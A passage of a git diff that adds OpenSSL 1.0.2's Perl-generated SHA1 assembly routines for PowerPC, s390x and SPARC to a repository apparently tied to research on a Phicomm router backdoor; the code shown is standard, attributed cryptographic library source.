+# registers and counter register contains amount of chunks to
+# digest...
+$code.=<<___;
+.align	4
+Lsha1_block_private:
+___
+$code.=<<___;	# load K_00_19
+	lis	$K,0x5a82
+	ori	$K,$K,0x7999
+___
+for($i=0;$i<20;$i++)	{ &BODY_00_19($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;	# load K_20_39
+	lis	$K,0x6ed9
+	ori	$K,$K,0xeba1
+___
+for(;$i<40;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;	# load K_40_59
+	lis	$K,0x8f1b
+	ori	$K,$K,0xbcdc
+___
+for(;$i<60;$i++)	{ &BODY_40_59($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;	# load K_60_79
+	lis	$K,0xca62
+	ori	$K,$K,0xc1d6
+___
+for(;$i<80;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	add	r16,r16,$E
+	add	r17,r17,$T
+	add	r18,r18,$A
+	add	r19,r19,$B
+	add	r20,r20,$C
+	stw	r16,0($ctx)
+	mr	$A,r16
+	stw	r17,4($ctx)
+	mr	$B,r17
+	stw	r18,8($ctx)
+	mr	$C,r18
+	stw	r19,12($ctx)
+	mr	$D,r19
+	stw	r20,16($ctx)
+	mr	$E,r20
+	addi	$inp,$inp,`16*4`
+	bdnz-	Lsha1_block_private
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+.size	.sha1_block_data_order,.-.sha1_block_data_order
+___
+$code.=<<___;
+.asciz	"SHA1 block transform for PPC, CRYPTOGAMS by <appro\@fy.chalmers.se>"
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-s390x.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-s390x.pl
new file mode 100644
index 0000000..9193dda
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-s390x.pl
@@ -0,0 +1,246 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# SHA1 block procedure for s390x.
+
+# April 2007.
+#
+# Performance is >30% better than gcc 3.3 generated code. But the real
+# twist is that SHA1 hardware support is detected and utilized. In
+# which case performance can reach further >4.5x for larger chunks.
+
+# January 2009.
+#
+# Optimize Xupdate for amount of memory references and reschedule
+# instructions to favour dual-issue z10 pipeline. On z10 hardware is
+# "only" ~2.3x faster than software.
+
+# November 2010.
+#
+# Adapt for -m31 build. If kernel supports what's called "highgprs"
+# feature on Linux [see /proc/cpuinfo], it's possible to use 64-bit
+# instructions and achieve "64-bit" performance even in 31-bit legacy
+# application context. The feature is not specific to any particular
+# processor, as long as it's "z-CPU". Latter implies that the code
+# remains z/Architecture specific.
+
+$kimdfunc=1;	# magic function code for kimd instruction
+
+$flavour = shift;
+
+if ($flavour =~ /3[12]/) {
+	$SIZE_T=4;
+	$g="";
+} else {
+	$SIZE_T=8;
+	$g="g";
+}
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$K_00_39="%r0"; $K=$K_00_39;
+$K_40_79="%r1";
+$ctx="%r2";	$prefetch="%r2";
+$inp="%r3";
+$len="%r4";
+
+$A="%r5";
+$B="%r6";
+$C="%r7";
+$D="%r8";
+$E="%r9";	@V=($A,$B,$C,$D,$E);
+$t0="%r10";
+$t1="%r11";
+@X=("%r12","%r13","%r14");
+$sp="%r15";
+
+$stdframe=16*$SIZE_T+4*8;
+$frame=$stdframe+16*4;
+
+sub Xupdate {
+my $i=shift;
+
+$code.=<<___ if ($i==15);
+	lg	$prefetch,$stdframe($sp)	### Xupdate(16) warm-up
+	lr	$X[0],$X[2]
+___
+return if ($i&1);	# Xupdate is vectorized and executed every 2nd cycle
+$code.=<<___ if ($i<16);
+	lg	$X[0],`$i*4`($inp)	### Xload($i)
+	rllg	$X[1],$X[0],32
+___
+$code.=<<___ if ($i>=16);
+	xgr	$X[0],$prefetch		### Xupdate($i)
+	lg	$prefetch,`$stdframe+4*(($i+2)%16)`($sp)
+	xg	$X[0],`$stdframe+4*(($i+8)%16)`($sp)
+	xgr	$X[0],$prefetch
+	rll	$X[0],$X[0],1
+	rllg	$X[1],$X[0],32
+	rll	$X[1],$X[1],1
+	rllg	$X[0],$X[1],32
+	lr	$X[2],$X[1]		# feedback
+___
+$code.=<<___ if ($i<=70);
+	stg	$X[0],`$stdframe+4*($i%16)`($sp)
+___
+unshift(@X,pop(@X));
+}
+
+sub BODY_00_19 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $xi=$X[1];
+
+	&Xupdate($i);
+$code.=<<___;
+	alr	$e,$K		### $i
+	rll	$t1,$a,5
+	lr	$t0,$d
+	xr	$t0,$c
+	alr	$e,$t1
+	nr	$t0,$b
+	alr	$e,$xi
+	xr	$t0,$d
+	rll	$b,$b,30
+	alr	$e,$t0
+___
+}
+
+sub BODY_20_39 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $xi=$X[1];
+
+	&Xupdate($i);
+$code.=<<___;
+	alr	$e,$K		### $i
+	rll	$t1,$a,5
+	lr	$t0,$b
+	alr	$e,$t1
+	xr	$t0,$c
+	alr	$e,$xi
+	xr	$t0,$d
+	rll	$b,$b,30
+	alr	$e,$t0
+___
+}
+
+sub BODY_40_59 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $xi=$X[1];
+
+	&Xupdate($i);
+$code.=<<___;
+	alr	$e,$K		### $i
+	rll	$t1,$a,5
+	lr	$t0,$b
+	alr	$e,$t1
+	or	$t0,$c
+	lr	$t1,$b
+	nr	$t0,$d
+	nr	$t1,$c
+	alr	$e,$xi
+	or	$t0,$t1
+	rll	$b,$b,30
+	alr	$e,$t0
+___
+}
+
+$code.=<<___;
+.text
+.align	64
+.type	Ktable,\@object
+Ktable: .long	0x5a827999,0x6ed9eba1,0x8f1bbcdc,0xca62c1d6
+	.skip	48	#.long	0,0,0,0,0,0,0,0,0,0,0,0
+.size	Ktable,.-Ktable
+.globl	sha1_block_data_order
+.type	sha1_block_data_order,\@function
+sha1_block_data_order:
+___
+$code.=<<___ if ($kimdfunc);
+	larl	%r1,OPENSSL_s390xcap_P
+	lg	%r0,0(%r1)
+	tmhl	%r0,0x4000	# check for message-security assist
+	jz	.Lsoftware
+	lghi	%r0,0
+	la	%r1,`2*$SIZE_T`($sp)
+	.long	0xb93e0002	# kimd %r0,%r2
+	lg	%r0,`2*$SIZE_T`($sp)
+	tmhh	%r0,`0x8000>>$kimdfunc`
+	jz	.Lsoftware
+	lghi	%r0,$kimdfunc
+	lgr	%r1,$ctx
+	lgr	%r2,$inp
+	sllg	%r3,$len,6
+	.long	0xb93e0002	# kimd %r0,%r2
+	brc	1,.-4		# pay attention to "partial completion"
+	br	%r14
+.align	16
+.Lsoftware:
+___
+$code.=<<___;
+	lghi	%r1,-$frame
+	st${g}	$ctx,`2*$SIZE_T`($sp)
+	stm${g}	%r6,%r15,`6*$SIZE_T`($sp)
+	lgr	%r0,$sp
+	la	$sp,0(%r1,$sp)
+	st${g}	%r0,0($sp)
+
+	larl	$t0,Ktable
+	llgf	$A,0($ctx)
+	llgf	$B,4($ctx)
+	llgf	$C,8($ctx)
+	llgf	$D,12($ctx)
+	llgf	$E,16($ctx)
+
+	lg	$K_00_39,0($t0)
+	lg	$K_40_79,8($t0)
+
+.Lloop:
+	rllg	$K_00_39,$K_00_39,32
+___
+for ($i=0;$i<20;$i++)	{ &BODY_00_19($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	rllg	$K_00_39,$K_00_39,32
+___
+for (;$i<40;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;	$K=$K_40_79;
+	rllg	$K_40_79,$K_40_79,32
+___
+for (;$i<60;$i++)	{ &BODY_40_59($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	rllg	$K_40_79,$K_40_79,32
+___
+for (;$i<80;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+
+	l${g}	$ctx,`$frame+2*$SIZE_T`($sp)
+	la	$inp,64($inp)
+	al	$A,0($ctx)
+	al	$B,4($ctx)
+	al	$C,8($ctx)
+	al	$D,12($ctx)
+	al	$E,16($ctx)
+	st	$A,0($ctx)
+	st	$B,4($ctx)
+	st	$C,8($ctx)
+	st	$D,12($ctx)
+	st	$E,16($ctx)
+	brct${g} $len,.Lloop
+
+	lm${g}	%r6,%r15,`$frame+6*$SIZE_T`($sp)
+	br	%r14
+.size	sha1_block_data_order,.-sha1_block_data_order
+.string	"SHA1 block transform for s390x, CRYPTOGAMS by <appro\@openssl.org>"
+.comm	OPENSSL_s390xcap_P,16,8
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-sparcv9.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-sparcv9.pl
new file mode 100644
index 0000000..b5efcde
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-sparcv9.pl
@@ -0,0 +1,427 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+#
+# Hardware SPARC T4 support by David S. Miller <davem@davemloft.net>.
+# ====================================================================
+
+# Performance improvement is not really impressive on pre-T1 CPU: +8%
+# over Sun C and +25% over gcc [3.3]. While on T1, a.k.a. Niagara, it
+# turned to be 40% faster than 64-bit code generated by Sun C 5.8 and
+# >2x than 64-bit code generated by gcc 3.4. And there is a gimmick.
+# X[16] vector is packed to 8 64-bit registers and as result nothing
+# is spilled on stack. In addition input data is loaded in compact
+# instruction sequence, thus minimizing the window when the code is
+# subject to [inter-thread] cache-thrashing hazard. The goal is to
+# ensure scalability on UltraSPARC T1, or rather to avoid decay when
+# amount of active threads exceeds the number of physical cores.
+
+# SPARC T4 SHA1 hardware achieves 3.72 cycles per byte, which is 3.1x
+# faster than software. Multi-process benchmark saturates at 11x
+# single-process result on 8-core processor, or ~9GBps per 2.85GHz
+# socket.
+
+$output=shift;
+open STDOUT,">$output";
+
+@X=("%o0","%o1","%o2","%o3","%o4","%o5","%g1","%o7");
+$rot1m="%g2";
+$tmp64="%g3";
+$Xi="%g4";
+$A="%l0";
+$B="%l1";
+$C="%l2";
+$D="%l3";
+$E="%l4";
+@V=($A,$B,$C,$D,$E);
+$K_00_19="%l5";
+$K_20_39="%l6";
+$K_40_59="%l7";
+$K_60_79="%g5";
+@K=($K_00_19,$K_20_39,$K_40_59,$K_60_79);
+
+$ctx="%i0";
+$inp="%i1";
+$len="%i2";
+$tmp0="%i3";
+$tmp1="%i4";
+$tmp2="%i5";
+
+sub BODY_00_15 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $xi=($i&1)?@X[($i/2)%8]:$Xi;
+
+$code.=<<___;
+	sll	$a,5,$tmp0		!! $i
+	add	@K[$i/20],$e,$e
+	srl	$a,27,$tmp1
+	add	$tmp0,$e,$e
+	and	$c,$b,$tmp0
+	add	$tmp1,$e,$e
+	sll	$b,30,$tmp2
+	andn	$d,$b,$tmp1
+	srl	$b,2,$b
+	or	$tmp1,$tmp0,$tmp1
+	or	$tmp2,$b,$b
+	add	$xi,$e,$e
+___
+if ($i&1 && $i<15) {
+	$code.=
+	"	srlx	@X[(($i+1)/2)%8],32,$Xi\n";
+}
+$code.=<<___;
+	add	$tmp1,$e,$e
+___
+}
+
+sub Xupdate {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i/2;
+
+if ($i&1) {
+$code.=<<___;
+	sll	$a,5,$tmp0		!! $i
+	add	@K[$i/20],$e,$e
+	srl	$a,27,$tmp1
+___
+} else {
+$code.=<<___;
+	sllx	@X[($j+6)%8],32,$Xi	! Xupdate($i)
+	xor	@X[($j+1)%8],@X[$j%8],@X[$j%8]
+	srlx	@X[($j+7)%8],32,$tmp1
+	xor	@X[($j+4)%8],@X[$j%8],@X[$j%8]
+	sll	$a,5,$tmp0		!! $i
+	or	$tmp1,$Xi,$Xi
+	add	@K[$i/20],$e,$e		!!
+	xor	$Xi,@X[$j%8],@X[$j%8]
+	srlx	@X[$j%8],31,$Xi
+	add	@X[$j%8],@X[$j%8],@X[$j%8]
+	and	$Xi,$rot1m,$Xi
+	andn	@X[$j%8],$rot1m,@X[$j%8]
+	srl	$a,27,$tmp1		!!
+	or	$Xi,@X[$j%8],@X[$j%8]
+___
+}
+}
+
+sub BODY_16_19 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+
+	&Xupdate(@_);
+    if ($i&1) {
+	$xi=@X[($i/2)%8];
+    } else {
+	$xi=$Xi;
+	$code.="\tsrlx	@X[($i/2)%8],32,$xi\n";
+    }
+$code.=<<___;
+	add	$tmp0,$e,$e		!!
+	and	$c,$b,$tmp0
+	add	$tmp1,$e,$e
+	sll	$b,30,$tmp2
+	add	$xi,$e,$e
+	andn	$d,$b,$tmp1
+	srl	$b,2,$b
+	or	$tmp1,$tmp0,$tmp1
+	or	$tmp2,$b,$b
+	add	$tmp1,$e,$e
+___
+}
+
+sub BODY_20_39 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $xi;
+	&Xupdate(@_);
+    if ($i&1) {
+	$xi=@X[($i/2)%8];
+    } else {
+	$xi=$Xi;
+	$code.="\tsrlx	@X[($i/2)%8],32,$xi\n";
+    }
+$code.=<<___;
+	add	$tmp0,$e,$e		!!
+	xor	$c,$b,$tmp0
+	add	$tmp1,$e,$e
+	sll	$b,30,$tmp2
+	xor	$d,$tmp0,$tmp1
+	srl	$b,2,$b
+	add	$tmp1,$e,$e
+	or	$tmp2,$b,$b
+	add	$xi,$e,$e
+___
+}
+
+sub BODY_40_59 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $xi;
+	&Xupdate(@_);
+    if ($i&1) {
+	$xi=@X[($i/2)%8];
+    } else {
+	$xi=$Xi;
+	$code.="\tsrlx	@X[($i/2)%8],32,$xi\n";
+    }
+$code.=<<___;
+	add	$tmp0,$e,$e		!!
+	and	$c,$b,$tmp0
+	add	$tmp1,$e,$e
+	sll	$b,30,$tmp2
+	or	$c,$b,$tmp1
+	srl	$b,2,$b
+	and	$d,$tmp1,$tmp1
+	add	$xi,$e,$e
+	or	$tmp1,$tmp0,$tmp1
+	or	$tmp2,$b,$b
+	add	$tmp1,$e,$e
+___
+}
+
+$code.=<<___;
+#include "sparc_arch.h"
+
+#ifdef __arch64__
+.register	%g2,#scratch
+.register	%g3,#scratch
+#endif
+
+.section	".text",#alloc,#execinstr
+
+#ifdef __PIC__
+SPARC_PIC_THUNK(%g1)
+#endif
+
+.align	32
+.globl	sha1_block_data_order
+sha1_block_data_order:
+	SPARC_LOAD_ADDRESS_LEAF(OPENSSL_sparcv9cap_P,%g1,%g5)
+	ld	[%g1+4],%g1		! OPENSSL_sparcv9cap_P[1]
+
+	andcc	%g1, CFR_SHA1, %g0
+	be	.Lsoftware
+	nop
+
+	ld	[%o0 + 0x00], %f0	! load context
+	ld	[%o0 + 0x04], %f1
+	ld	[%o0 + 0x08], %f2
+	andcc	%o1, 0x7, %g0
+	ld	[%o0 + 0x0c], %f3
+	bne,pn	%icc, .Lhwunaligned
+	 ld	[%o0 + 0x10], %f4
+
+.Lhw_loop:
+	ldd	[%o1 + 0x00], %f8
+	ldd	[%o1 + 0x08], %f10
+	ldd	[%o1 + 0x10], %f12
+	ldd	[%o1 + 0x18], %f14
+	ldd	[%o1 + 0x20], %f16
+	ldd	[%o1 + 0x28], %f18
+	ldd	[%o1 + 0x30], %f20
+	subcc	%o2, 1, %o2		! done yet? 
+	ldd	[%o1 + 0x38], %f22
+	add	%o1, 0x40, %o1
+	prefetch [%o1 + 63], 20
+
+	.word	0x81b02820		! SHA1
+
+	bne,pt	SIZE_T_CC, .Lhw_loop
+	nop
+
+.Lhwfinish:
+	st	%f0, [%o0 + 0x00]	! store context
+	st	%f1, [%o0 + 0x04]
+	st	%f2, [%o0 + 0x08]
+	st	%f3, [%o0 + 0x0c]
+	retl
+	st	%f4, [%o0 + 0x10]
+
+.align	8
+.Lhwunaligned:
+	alignaddr %o1, %g0, %o1
+
+	ldd	[%o1 + 0x00], %f10
+.Lhwunaligned_loop:
+	ldd	[%o1 + 0x08], %f12
+	ldd	[%o1 + 0x10], %f14
+	ldd	[%o1 + 0x18], %f16
+	ldd	[%o1 + 0x20], %f18
+	ldd	[%o1 + 0x28], %f20
+	ldd	[%o1 + 0x30], %f22
+	ldd	[%o1 + 0x38], %f24
+	subcc	%o2, 1, %o2		! done yet?
+	ldd	[%o1 + 0x40], %f26
+	add	%o1, 0x40, %o1
+	prefetch [%o1 + 63], 20
+
+	faligndata %f10, %f12, %f8
+	faligndata %f12, %f14, %f10
+	faligndata %f14, %f16, %f12
+	faligndata %f16, %f18, %f14
+	faligndata %f18, %f20, %f16
+	faligndata %f20, %f22, %f18
+	faligndata %f22, %f24, %f20
+	faligndata %f24, %f26, %f22
+
+	.word	0x81b02820		! SHA1
+
+	bne,pt	SIZE_T_CC, .Lhwunaligned_loop
+	for	%f26, %f26, %f10	! %f10=%f26
+
+	ba	.Lhwfinish
+	nop
+
+.align	16
+.Lsoftware:
+	save	%sp,-STACK_FRAME,%sp
+	sllx	$len,6,$len
+	add	$inp,$len,$len
+
+	or	%g0,1,$rot1m
+	sllx	$rot1m,32,$rot1m
+	or	$rot1m,1,$rot1m
+
+	ld	[$ctx+0],$A
+	ld	[$ctx+4],$B
+	ld	[$ctx+8],$C
+	ld	[$ctx+12],$D
+	ld	[$ctx+16],$E
+	andn	$inp,7,$tmp0
+
+	sethi	%hi(0x5a827999),$K_00_19
+	or	$K_00_19,%lo(0x5a827999),$K_00_19
+	sethi	%hi(0x6ed9eba1),$K_20_39
+	or	$K_20_39,%lo(0x6ed9eba1),$K_20_39
+	sethi	%hi(0x8f1bbcdc),$K_40_59
+	or	$K_40_59,%lo(0x8f1bbcdc),$K_40_59
+	sethi	%hi(0xca62c1d6),$K_60_79
+	or	$K_60_79,%lo(0xca62c1d6),$K_60_79
+
+.Lloop:
+	ldx	[$tmp0+0],@X[0]
+	ldx	[$tmp0+16],@X[2]
+	ldx	[$tmp0+32],@X[4]
+	ldx	[$tmp0+48],@X[6]
+	and	$inp,7,$tmp1
+	ldx	[$tmp0+8],@X[1]
+	sll	$tmp1,3,$tmp1
+	ldx	[$tmp0+24],@X[3]
+	subcc	%g0,$tmp1,$tmp2	! should be 64-$tmp1, but -$tmp1 works too
+	ldx	[$tmp0+40],@X[5]
+	bz,pt	%icc,.Laligned
+	ldx	[$tmp0+56],@X[7]
+
+	sllx	@X[0],$tmp1,@X[0]
+	ldx	[$tmp0+64],$tmp64
+___
+for($i=0;$i<7;$i++)
+{   $code.=<<___;
+	srlx	@X[$i+1],$tmp2,$Xi
+	sllx	@X[$i+1],$tmp1,@X[$i+1]
+	or	$Xi,@X[$i],@X[$i]
+___
+}
+$code.=<<___;
+	srlx	$tmp64,$tmp2,$tmp64
+	or	$tmp64,@X[7],@X[7]
+.Laligned:
+	srlx	@X[0],32,$Xi
+___
+for ($i=0;$i<16;$i++)	{ &BODY_00_15($i,@V); unshift(@V,pop(@V)); }
+for (;$i<20;$i++)	{ &BODY_16_19($i,@V); unshift(@V,pop(@V)); }
+for (;$i<40;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+for (;$i<60;$i++)	{ &BODY_40_59($i,@V); unshift(@V,pop(@V)); }
+for (;$i<80;$i++)	{ &BODY_20_39($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+
+	ld	[$ctx+0],@X[0]
+	ld	[$ctx+4],@X[1]
+	ld	[$ctx+8],@X[2]
+	ld	[$ctx+12],@X[3]
+	add	$inp,64,$inp
+	ld	[$ctx+16],@X[4]
+	cmp	$inp,$len
+
+	add	$A,@X[0],$A
+	st	$A,[$ctx+0]
+	add	$B,@X[1],$B
+	st	$B,[$ctx+4]
+	add	$C,@X[2],$C
+	st	$C,[$ctx+8]
+	add	$D,@X[3],$D
+	st	$D,[$ctx+12]
+	add	$E,@X[4],$E
+	st	$E,[$ctx+16]
+
+	bne	SIZE_T_CC,.Lloop
+	andn	$inp,7,$tmp0
+
+	ret
+	restore
+.type	sha1_block_data_order,#function
+.size	sha1_block_data_order,(.-sha1_block_data_order)
+.asciz	"SHA1 block transform for SPARCv9, CRYPTOGAMS by <appro\@openssl.org>"
+.align	4
+___
+
+# Purpose of these subroutines is to explicitly encode VIS instructions,
+# so that one can compile the module without having to specify VIS
+# extentions on compiler command line, e.g. -xarch=v9 vs. -xarch=v9a.
+# Idea is to reserve for option to produce "universal" binary and let
+# programmer detect if current CPU is VIS capable at run-time.
+sub unvis {
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my $ref,$opf;
+my %visopf = (	"faligndata"	=> 0x048,
+		"for"		=> 0x07c	);
+
+    $ref = "$mnemonic\t$rs1,$rs2,$rd";
+
+    if ($opf=$visopf{$mnemonic}) {
+	foreach ($rs1,$rs2,$rd) {
+	    return $ref if (!/%f([0-9]{1,2})/);
+	    $_=$1;
+	    if ($1>=32) {
+		return $ref if ($1&1);
+		# re-encode for upper double register addressing
+		$_=($1|$1>>5)&31;
+	    }
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			0x81b00000|$rd<<25|$rs1<<14|$opf<<5|$rs2,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+sub unalignaddr {
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my %bias = ( "g" => 0, "o" => 8, "l" => 16, "i" => 24 );
+my $ref="$mnemonic\t$rs1,$rs2,$rd";
+
+    foreach ($rs1,$rs2,$rd) {
+	if (/%([goli])([0-7])/)	{ $_=$bias{$1}+$2; }
+	else			{ return $ref; }
+    }
+    return  sprintf ".word\t0x%08x !%s",
+		    0x81b00300|$rd<<25|$rs1<<14|$rs2,
+		    $ref;
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/ge;
+
+	s/\b(f[^\s]*)\s+(%f[0-9]{1,2}),\s*(%f[0-9]{1,2}),\s*(%f[0-9]{1,2})/
+		&unvis($1,$2,$3,$4)
+	 /ge;
+	s/\b(alignaddr)\s+(%[goli][0-7]),\s*(%[goli][0-7]),\s*(%[goli][0-7])/
+		&unalignaddr($1,$2,$3,$4)
+	 /ge;
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-sparcv9a.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-sparcv9a.pl
new file mode 100644
index 0000000..e65291b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-sparcv9a.pl
@@ -0,0 +1,601 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# January 2009
+#
+# Provided that UltraSPARC VIS instructions are pipe-lined(*) and
+# pairable(*) with IALU ones, offloading of Xupdate to the UltraSPARC
+# Graphic Unit would make it possible to achieve higher instruction-
+# level parallelism, ILP, and thus higher performance. It should be
+# explicitly noted that ILP is the keyword, and it means that this
+# code would be unsuitable for cores like UltraSPARC-Tx. The idea is
+# not really novel, Sun had VIS-powered implementation for a while.
+# Unlike Sun's implementation this one can process multiple unaligned
+# input blocks, and as such works as drop-in replacement for OpenSSL
+# sha1_block_data_order. Performance improvement was measured to be
+# 40% over pure IALU sha1-sparcv9.pl on UltraSPARC-IIi, but 12% on
+# UltraSPARC-III. See below for discussion...
+#
+# The module does not present direct interest for OpenSSL, because
+# it doesn't provide better performance on contemporary SPARCv9 CPUs,
+# UltraSPARC-Tx and SPARC64-V[II] to be specific. Those who feel they
+# absolutely must score on UltraSPARC-I-IV can simply replace
+# crypto/sha/asm/sha1-sparcv9.pl with this module.
+#
+# (*)	"Pipe-lined" means that even if it takes several cycles to
+#	complete, next instruction using same functional unit [but not
+#	depending on the result of the current instruction] can start
+#	execution without having to wait for the unit. "Pairable"
+#	means that two [or more] independent instructions can be
+#	issued at the very same time.
+
+$bits=32;
+for (@ARGV)	{ $bits=64 if (/\-m64/ || /\-xarch\=v9/); }
+if ($bits==64)	{ $bias=2047; $frame=192; }
+else		{ $bias=0;    $frame=112; }
+
+$output=shift;
+open STDOUT,">$output";
+
+$ctx="%i0";
+$inp="%i1";
+$len="%i2";
+$tmp0="%i3";
+$tmp1="%i4";
+$tmp2="%i5";
+$tmp3="%g5";
+
+$base="%g1";
+$align="%g4";
+$Xfer="%o5";
+$nXfer=$tmp3;
+$Xi="%o7";
+
+$A="%l0";
+$B="%l1";
+$C="%l2";
+$D="%l3";
+$E="%l4";
+@V=($A,$B,$C,$D,$E);
+
+$Actx="%o0";
+$Bctx="%o1";
+$Cctx="%o2";
+$Dctx="%o3";
+$Ectx="%o4";
+
+$fmul="%f32";
+$VK_00_19="%f34";
+$VK_20_39="%f36";
+$VK_40_59="%f38";
+$VK_60_79="%f40";
+@VK=($VK_00_19,$VK_20_39,$VK_40_59,$VK_60_79);
+@X=("%f0", "%f1", "%f2", "%f3", "%f4", "%f5", "%f6", "%f7",
+    "%f8", "%f9","%f10","%f11","%f12","%f13","%f14","%f15","%f16");
+
+# This is reference 2x-parallelized VIS-powered Xupdate procedure. It
+# covers even K_NN_MM addition...
+sub Xupdate {
+my ($i)=@_;
+my $K=@VK[($i+16)/20];
+my $j=($i+16)%16;
+
+#	[ provided that GSR.alignaddr_offset is 5, $mul contains
+#	  0x100ULL<<32|0x100 value and K_NN_MM are pre-loaded to
+#	  chosen registers... ]
+$code.=<<___;
+	fxors		@X[($j+13)%16],@X[$j],@X[$j]	!-1/-1/-1:X[0]^=X[13]
+	fxors		@X[($j+14)%16],@X[$j+1],@X[$j+1]! 0/ 0/ 0:X[1]^=X[14]
+	fxor		@X[($j+2)%16],@X[($j+8)%16],%f18! 1/ 1/ 1:Tmp=X[2,3]^X[8,9]
+	fxor		%f18,@X[$j],@X[$j]		! 2/ 4/ 3:X[0,1]^=X[2,3]^X[8,9]
+	faligndata	@X[$j],@X[$j],%f18		! 3/ 7/ 5:Tmp=X[0,1]>>>24
+	fpadd32		@X[$j],@X[$j],@X[$j]		! 4/ 8/ 6:X[0,1]<<=1
+	fmul8ulx16	%f18,$fmul,%f18			! 5/10/ 7:Tmp>>=7, Tmp&=1
+	![fxors		%f15,%f2,%f2]
+	for		%f18,@X[$j],@X[$j]		! 8/14/10:X[0,1]|=Tmp
+	![fxors		%f0,%f3,%f3]			!10/17/12:X[0] dependency
+	fpadd32		$K,@X[$j],%f20
+	std		%f20,[$Xfer+`4*$j`]
+___
+# The numbers delimited with slash are the earliest possible dispatch
+# cycles for given instruction assuming 1 cycle latency for simple VIS
+# instructions, such as on UltraSPARC-I&II, 3 cycles latency, such as
+# on UltraSPARC-III&IV, and 2 cycles latency(*), respectively. Being
+# 2x-parallelized the procedure is "worth" 5, 8.5 or 6 ticks per SHA1
+# round. As [long as] FPU/VIS instructions are perfectly pairable with
+# IALU ones, the round timing is defined by the maximum between VIS
+# and IALU timings. The latter varies from round to round and averages
+# out at 6.25 ticks. This means that USI&II should operate at IALU
+# rate, while USIII&IV - at VIS rate. This explains why performance
+# improvement varies among processors. Well, given that pure IALU
+# sha1-sparcv9.pl module exhibits virtually uniform performance of
+# ~9.3 cycles per SHA1 round. Timings mentioned above are theoretical
+# lower limits. Real-life performance was measured to be 6.6 cycles
+# per SHA1 round on USIIi and 8.3 on USIII. The latter is lower than
+# half-round VIS timing, because there are 16 Xupdate-free rounds,
+# which "push down" average theoretical timing to 8 cycles...
+
+# (*)	SPARC64-V[II] was originally believed to have 2 cycles VIS
+#	latency. Well, it might have, but it doesn't have dedicated
+#	VIS-unit. Instead, VIS instructions are executed by other
+#	functional units, ones used here - by IALU. This doesn't
+#	improve effective ILP...
+}
+
+# The reference Xupdate procedure is then "strained" over *pairs* of
+# BODY_NN_MM and kind of modulo-scheduled in respect to X[n]^=X[n+13]
+# and K_NN_MM addition. It's "running" 15 rounds ahead, which leaves
+# plenty of room to amortize for read-after-write hazard, as well as
+# to fetch and align input for the next spin. The VIS instructions are
+# scheduled for latency of 2 cycles, because there are not enough IALU
+# instructions to schedule for latency of 3, while scheduling for 1
+# would give no gain on USI&II anyway.
+
+sub BODY_00_19 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i&~1;
+my $k=($j+16+2)%16;	# ahead reference
+my $l=($j+16-2)%16;	# behind reference
+my $K=@VK[($j+16-2)/20];
+
+$j=($j+16)%16;
+
+$code.=<<___ if (!($i&1));
+	sll		$a,5,$tmp0			!! $i
